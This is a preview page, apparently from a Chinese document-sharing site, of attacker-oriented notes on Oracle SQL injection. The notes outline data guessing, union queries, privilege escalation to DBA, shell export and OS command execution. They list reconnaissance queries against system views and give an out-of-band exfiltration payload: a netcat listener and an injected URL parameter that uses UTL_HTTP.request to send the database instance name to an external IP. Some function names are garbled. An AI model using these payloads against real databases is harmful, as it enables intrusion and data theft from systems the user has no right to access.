资源预览内容
第1页 / 共5页
第2页 / 共5页
第3页 / 共5页
第4页 / 共5页
第5页 / 共5页
亲,该文档总共5页全部预览完了,如果喜欢就下载吧!
资源描述
Un Oracle注射笔记脚本安全 电脑资料 Oracle说明: Oracle的注射攻击学习,可以归为: a.基本猜解: 1. 数据库名的猜解,表名的猜解,字段的猜解,数据的猜解.等基本数据的猜解.(半折法) 2. union方式猜解 3. UTL_.request反弹数据猜解.(需能上网) 4. 其它方式的猜解,诸如把表段内容,update或insert入可以显示的字段里,诸如网页,然后读取获知. b.高级攻击方式: 1. 数据库提权攻击,一般是利用函数漏洞,提升为DBA权限.(oracle的DBA相当于mssql的sa,为数据库的最高权限) 2. 导出shell攻击. 3. 利用数据库漏洞,执行系统指定. c.数据库漏洞. 1. 远程溢出,本地提权等漏洞(我们只管exp) 2. 存在的配置方面的漏洞,诸如默认弱口令,以及得到弱口令之后,如何提权等原因. 第一部份: =基本信息的猜解= 说明: Oracle会把一些有用的信息保存在系统表里面,诸如all_tables,所以注射时对这些表的猜解,可以获取到很多的基本信息. 获得操作系统版本: select member from v$logfile where rownum=1 通过路径方式判断操作系统.如果出现c:,d:类的是windows,其它为*nix 查看sid: select instance_name from v$instance 查询当前用户权限 select * from session_roles 当前数据库版本 select banner from sys.v_$version where rownum=1 服务器出口IP 用utl_.request可以实现 服务器监听IP select utl_inaddr.get_host_address from dual 当前连接用户 select SYS_CONTEXT (USERENV, CURRENT_USER) from dual 反弹方式:(本机:nc -vv -lp 8000) .target./servlet/bbsxx.Userdetail?sUserName=test and UTL_.request(59.151.22.37:8000/|(select instance_name from v$instance where rownum=1)=1- =基本信息的猜= 基本信息的猜解主要是方便后期的注射攻击. 内容仅供参考
收藏 下载该资源
网站客服QQ:2055934822
金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号